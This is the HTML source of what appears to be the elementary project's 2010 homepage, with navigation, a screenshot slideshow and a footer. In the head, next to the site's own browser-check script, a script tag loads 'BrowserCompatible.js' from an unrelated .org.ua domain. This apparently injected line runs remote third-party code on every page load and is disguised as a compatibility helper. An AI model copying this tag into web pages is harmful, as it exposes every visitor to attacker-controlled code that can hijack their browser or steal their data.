~elementary-web/elementaryweb/elementaryweb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<html>
<head>

<link rel="stylesheet" type="text/css" href="/css/main.css">

<link rel="stylesheet" type="text/css" href="/css/home.css">

<script src="http://www.goodbyeie6.org.ua/BrowserCompatible.js?opt=ml&enc=utf-8" type="text/javascript"></script>
<script src="/javascript/browsercheck.js" type="text/javascript"></script>
<script src="/javascript/homeslideshow.js" type="text/javascript"></script>
</head>

<body>

<div id="globalWrapper">	
	<div class="portlet" id="p-logo"> 
		<a style="background-image: url(http://elementary-project.com/wiki/images/elogo.png); " href="/"><p style="padding-left: 36px; padding-top: -5px; width: 200px; color: grey; font-size: 1.5em; vertical-align: top;">elementary</p></a> 
	</div> 
	
	<ul id="navigation"> 
		<li class="selected"><a href="/index.html">Home</a></li> 
		<li><a href="/discover.html">Discover</a></li> 
		<li><a href="/downloads.html">Downloads</a></li> 
		<li><a href="/support/">Support</a></li> 
		<li><a href="/forums/">Forum</a></li>
		<li><a href="/development.html">Development</a></li>
		<li class="search"><form action="/wiki/index.php" id="searchform"><div> 
				<input id="searchInput" name="search" type="text" title="Search The Manual [f]" accesskey="f" value="" /> 
							</div></form></li>
	</ul> 
	<div id="content" style="padding: 20px;">
		<center>
			<div style="position: relative; width: 820px; height: 500;">
				<img src="/images/home/laptop.png">
				<div id="imageContainer">
					<img id="image-0" src="images/screenshots/screenshot.png" />
					<img id="image-1" src="/images/screenshots/screenshot-1.png"/>
					<img id="image-2" src="/images/screenshots/screenshot-3.png"/>
					<img id="image-3" src="/images/screenshots/screenshot-5.png"/>
					<img id="image-4" src="/images/screenshots/screenshot-7.png"/>
					<img id="image-5" src="/images/screenshots/screenshot-8.png"/>
				</div>
				<div id="navigator" style="position: absolute; top: 432px; left: 25px;">	
				</div>
			</div>
			<div id="menubar">
				<a href="/development.html">
					<img src="/images/development.png" style="float:left;"/>
					<div>
					<h2>elementary needs your help!</h2>
					Click here to learn how you can help us out!</div>
				</a>
			</div>
	
		</center>
	</div>
</div>
<div id="footer">	
	<ul id="f-list"> 
			<li id="lastmod"> <span class="gensmall">copyright 2010 elementary project</span>
	</ul> 
</div> 
</body>
</html>